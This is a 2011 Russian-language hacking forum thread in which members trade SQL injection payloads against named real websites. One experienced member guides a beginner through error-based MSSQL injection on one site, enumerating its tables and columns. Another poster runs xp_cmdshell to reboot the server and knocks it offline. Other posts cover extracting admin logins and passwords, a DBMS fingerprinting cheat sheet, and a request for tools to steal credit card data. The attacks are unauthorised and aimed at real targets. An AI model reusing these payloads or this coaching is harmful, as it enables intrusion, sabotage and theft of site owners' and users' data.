RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-11 03:26:34.126666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2Smexatronik:
http://www.ak-47.us/AK47-FAQ.php?id=137)+order+by+1–+
http://www.simonsig.co.za/newsDisplay.php?TB_iframe=true&height=480&width=760&n_id=77+order+by+1–+
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-14 23:20:16.260000
|
|
|
Bapukada
Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
|
http://www.flowersun.ru/index.php?razdelID=810'
че дальше делать? Подбирать пароли…
http://www.flowersun.ru/index.php?razdelID=810'+union+select+1,2,3 и т.д. Так?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-20 22:05:51.883333
|
|
|
florgas
Сообщений: 377
Оценки: 0
Присоединился: 2009-10-12 14:44:27.050000
|
В моем случае на сайте/регистрации на sql'е используется такой адрес: http://***.***.***/***/index.php?act=news. Читал эту тему и что-то немножко не догоняю с чего начать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-23 22:31:40.393333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2Bapukada:
http://www.flowersun.ru/index.php?filenumber=13229'+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))>1–+&num=&razdelID=785&frompage=1
2florgas:
"Немножко не догоняю" в чём вопрос.
Если - "с чего начать?", то - со статей по SQL инъекциям.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-24 22:45:21.253333
|
|
|
florgas
Сообщений: 377
Оценки: 0
Присоединился: 2009-10-12 14:44:27.050000
|
r1dex, во всех статьях пишется про "id=", а у меня не так… Я уже все по статьям делал и когда я делаю какой-нибудь запрос просто ничего не происходит…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-01 21:31:21.413333
|
|
|
Cmsko666
Сообщений: 3
Оценки: 0
Присоединился: 2011-05-31 22:26:41.870000
|
Народ,что я не так написал в даном запросе,CMS DLE:
index.php?do=search&subaction=search&story=hfjvnc&sql_count=union+select+from+dle_users+where+user_group=1+limit+1--&titleonly=FOUR
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-02 01:15:02.106666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2Cmsko666:
union+select+столбцы+from+dle_users+where+user_group='1'+limit+1–
если кавычки не проходят, переводим в hex (без кавычек)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-02 14:33:35.816666
|
|
|
Cmsko666
Сообщений: 3
Оценки: 0
Присоединился: 2011-05-31 22:26:41.870000
|
r1dex тоесть нужно там где ты написал "столбцы" вписать типа 1,2,3,4… ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-03 00:09:25.950000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2Cmsko666:
Ну да, определяешь кол-во столбцов с помощью order by.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-03 08:53:12.316666
|
|
|
Cmsko666
Сообщений: 3
Оценки: 0
Присоединился: 2011-05-31 22:26:41.870000
|
r1dex,количество столбцов я лучше посмотрю в БД,всё таки CMS в свободном доступе.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-03 10:44:27.353333
|
|
|
NullByte
Сообщений: 16
Оценки: 0
Присоединился: 2011-05-05 12:08:06.893333
|
quote:
ORIGINAL: Cmsko666
r1dex,количество столбцов я лучше посмотрю в БД,всё таки CMS в свободном доступе.
Бред. Во первых с ордером будет быстрее чем лазить искать конкретную страницу двигла и там искать выводы столбцов, во вторых не факт что они совпадут с тем что на вашем сайте.
На счёт столбцов, там нужно вписать не 1,2,3,4, а имена столбцов которые нужны, логина и пароля думаю, остальные столбцы можно заполнить произвольными цифрами, главно чтобы были выбраны все селектом.. Допустим с ордер бай узнали что там их 5, и все видимые, значит будет что-то типа -1+union+selecet+login,pass,3,4,5+from+…. А вообще не мешало бы для начала ознакомится со статьями про инъекции, их куча
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-06 22:26:54.310000
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Доброго времени суток!
Сразу к делу!
Нашёл вот это:
http://www.ostashkov.ru/news/show-22306'/ (там много написано, нет смысла сюда копировать, кому интересно можете заглянуть;))
стал вазбираться, попробовал вот это
http://www.ostashkov.ru/news/show-22306'+union+select+1,2,3;--/ (ошибка union не подходит кол-во столбцов)
Тут естественно я начал радоваться, думал подберу столбцы и в базе поковыряюсь:
http://www.ostashkov.ru/news/show-22306'+union+select+1,2;--/ Подобрать-то подобрал, но вот реализация стала для меня проблемой, еденичку-то никуда не выводит, к тому же с ASP.NET сталкиваюсь впервые.
Посоветуйте что сделать с этим сайтом!
Заранее благодарен, жду ваших предложений!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-06 23:56:06.793333
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Ковырял-ковырял, сайт перестал отвечать. Хм!
Меня спалили или кто-то добрался?
Если 2ое расскажите как)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-07 00:10:50.390000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ну уронил сайт. Когда поднимут посмотрю что там.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-07 01:07:11.640000
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
А я думал это мои
http://www.ostashkov.ru/news/show-22306';exec+master..xp_cmdshell+'shutdown -r'--/ его положили=))
Хрен поймёшь выполняются команды или нет(
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-09 01:28:28.326666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Так это MSSQL.
http://www.ostashkov.ru/news/show-22306'+or+1=@@version–+/
Крутим так:
http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))–+/
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-10 18:03:07.280000
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Спасибо, за помощь. Но всё таки выдаёт следующее:
Ошибка преобразования значения nvarchar "RestReport" в тип данных int.
Описание: Необработанное исключение при выполнении текущего веб-запроса. Изучите трассировку стека для получения дополнительных сведений о данной ошибке и о вызвавшем ее фрагменте кода.
Сведения об исключении: System.Data.SqlClient.SqlException: Ошибка преобразования значения nvarchar "RestReport" в тип данных int.
П.С.:Я правильно запрос понял? 1=первому значению в инф_схеме.таблицы в колонке имя_таблицы, где имя таблицы НЕ первое значение в инф_схеме.таблицы в колонке имя_таблицы…
Странный запрос…))
П.П.С.:Понял что многого не знаю, полез луркать.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-10 18:25:27.436666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ну так "RestReport" и есть имя таблички…
Смотрим следующую..
http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+2+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))–+/
Видим - "cmsImageExclude" И т.д.
ЗЫ: Смотри FAQ по MSSQL инъекциям.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-10 18:43:15.246666
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Ёмаё! Теперь понятно)
П.С.:Уже читаю)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-11 01:44:56.723333
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
r1dex, без тебя не справиться(
просмотрел названия таблиц, хочу посмотреть назавания колонок для заинтересовавших таблиц, НО:
-подставленные в конец твоего запроса WHERE TABLE_NAME='xxx' выдают не то или пролистываться не хотят;
-LIKE '%pass%' (или другие маски с %) - Bad Request (Invalid URL), прочие маски тоже не дают результата(как с WHERE)
-пытался впихнуть CONCAT(), меня лаского послали, сказали: "тут такие не живут, не прописаны и мы о них не слышали вообще!"
-немогу понять как реализовать BETWEEN вместе с ROW_NUMBER(), что по некоторым данным заменит limit…
Есть что посоветовать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-11 20:36:20.396666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Узнаем 1-ую колонку:
http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RestReport')–+/
Узнаем 2-ую колонку:
http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RestReport'+AND+COLUMN_NAME+NOT+IN+('id'))–+/
Узнаем 3-юю:
http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RestReport'+AND+COLUMN_NAME+NOT+IN+('id','author'))–+/
И т.д.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-13 01:49:31.890000
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Спасибо, r1dex!
Вопросов ещё много, но, думаю, дальше разберусь сам.
Углубился в изучение МSSQL, затянуло=))
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-25 12:16:57.150000
|
|
|
kiddi
Сообщений: 1
Оценки: 0
Присоединился: 2011-06-25 11:51:29.686666
|
Всем привет!
можете помочь, у меня например есть сайт site.ru/id=36 , в куки есть парметр sid=3 и при изменениии его на такой sid=-3 выходит ошибка
Warning: get_value_by_attribute(): Node no longer exists (File: functions.php, Line: 227)
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given (File: class.DataBase.php, Line: 152)
это просто ошибка? тоесть с ней можно чтонить сделать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-29 23:15:07.836666
|
|
|
krasdix
Сообщений: 14
Оценки: 0
Присоединился: 2009-05-06 07:53:19.170000
|
Народ подскажите пожалуйста, вот есть в номере 6 2011 года "Хакер", там статья про SQL инъекцию в JOOMLA com_virtuemart… да я нашел сайт, и определил путем задержки как там было написано версию MYsql, там была дана ссылка на эксплойт, я скачал, посмотрел код, написан на pythone, а что дальше делать, просто не знаю, подскажите плиз.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-01 14:20:50.410000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
Всем доброе время суток. Возникла вот такая проблемка…
http://forums.d2evil.org/index.php?act=clans&a=-9+union+select+1,2,3,4,5,6+--+ Там вроде как слепая, пробую через Havijб прога вычисляет 6 полей потом пишет что уязвимости нет… (она там есть)
Кто сможет… по советуйте что можно сделать в данной ситуации…
За ранее спасибо.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-02 08:09:38.336666
|
|
|
OJIEHb
Сообщений: 151
Оценки: 0
Присоединился: 2010-12-01 19:04:30.843333
|
ver(): 5.1.49-3-log
user(): z1****7_m*@*7.2*1.1*0.*4
data(): z1****7_m*
Получил вот такие данные. Сначала UNION+SELECT сделал, а потом загнал на один сайт. Он раскрутил ее и выдал мне такие данные. Что мне с ними делать?
PS: * я поставил сам, дабы скрыть от вас возможно нужную информацию.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-04 01:48:58.560000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2kiddi:
В сети масса статей в которых написано как определить наличие уязвимости.
2krasdix
Банально, но…. запустить эксплоит (я знаю, я кэп)
2sepo
И почему ты думаешь, что там есть уязвимость?
2OJIEHb
5-ая ветка, в чем проблема? Крути дальше…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-11 10:46:38.183333
|
|
|
verynice
Сообщений: 2
Оценки: 0
Присоединился: 2011-07-11 10:09:24.600000
|
А как вытащить бд? если есть название и логин бд
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-12 17:43:44.146666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2verynice:
Если через SQL-inj, то просто раскручиваешь дальше…
213.Alexandro
По первой ссылке ошибки, по остальным 404. И что?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-13 23:27:55.950000
|
|
|
Once_pams
Сообщений: 3
Оценки: 0
Присоединился: 2011-07-13 23:16:31.770000
|
Народ подскажите что с этим сделать, я вобщем то новичок..) достаточно будет даже ответа типа "да можно" =) и хотя б куда копать и каким методом, перебор может или ещё как, дальше сам попробую =)
http://www.kontrolnaja.ru/dir/114642'
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-28 12:41:27.220000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: Once_pams
Народ подскажите что с этим сделать, я вобщем то новичок..) достаточно будет даже ответа типа "да можно" =) и хотя б куда копать и каким методом, перебор может или ещё как, дальше сам попробую =)
http://www.kontrolnaja.ru/dir/114642'
вроде нет
иньекции
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-28 14:01:54.016666
|
|
|
wekly
Сообщений: 505
Оценки: 0
Присоединился: 2011-07-08 14:35:05.483333
|
quote:
Народ подскажите что с этим сделать, я вобщем то новичок..) достаточно будет даже ответа типа "да можно" =) и хотя б куда копать и каким методом, перебор может или ещё как, дальше сам попробую =)
http://www.kontrolnaja.ru/dir/114642'
quote:
вроде нет
иньекции
Инъекции 100% нет.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-08-12 02:02:28.453333
|
|
|
xakir2
Сообщений: 55
Оценки: 0
Присоединился: 2010-05-28 13:57:22.590000
|
там их и не было
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-08-30 19:48:55.156666
|
|
|
worsvch
Сообщений: 23
Оценки: 0
Присоединился: 2009-02-27 21:40:43.653333
|
Подскажите как узнать какая СУБД и какой версии используется на сайте?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-09-01 00:01:26.010000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
1. Запросами. К примеру:
MySQL
id=1+procedure+analyse()
id=1+and+concat_ws(1)=1
id=1+and+connection_id()=connection_id()
MSSQL
id=1+and+len(@@version)=len(@@version)
id=1+and+(@@TEXTSIZE>@@LANGID)
PostgerSQL
id=1+and+1=1::int
id=1+and+pg_backend_pid()=pg_backend_pid()
id=1+and+5432=inet_server_port()
Access
id=1+and+1=StrConv(1,1)
id=1+and+Sgn(1)=Sgn(1)
Oracle
id=1+and+to_char(22)=to_char(2)||to_char(2)
id=1+and+instr4(1,1,1,1)=1
id=1+and+rownum=rownum
Sybase
id=1+and+inttohex(10)=inttohex(10)
2. По ошибкам:
PostgreSQL:
pg_exec()
pg_numrows()
pg_query()
pg_fetch_array()
и т.д.
Access:
[Microsoft][ODBC Microsoft Access Driver]
или
Microsoft JET Database Engine error
MS SQL:
[Microsoft][ODBC SQL Server Driver]
InterBase\Firebird:
ibase_query()
ibase_fetch_object()
ibase_free_result()
ibase_fetch_row()
Oracle:
ORA-01756
(И вообще всякие ORA)
Sybase:
Sybase error
sybase_query()
sybase_num_rows()
(с) Jokester
Ну а версию уже при раскрутке..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-09-14 03:35:46.883333
|
|
|
Hisoko160
Сообщений: 1
Оценки: 0
Присоединился: 2011-09-14 03:25:28.993333
|
www. lcsg.fr/?page=%1&what=news
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-09-14 05:43:48.610000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Просто раскрытие путей.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-11-08 12:38:59.503333
|
|
|
thom crowz
Сообщений: 37
Оценки: 0
Присоединился: 2011-03-01 14:49:21.793333
|
where is best program to get database information , by sql for example credit card information? and where is the resource?
|
|
|
|
|
|
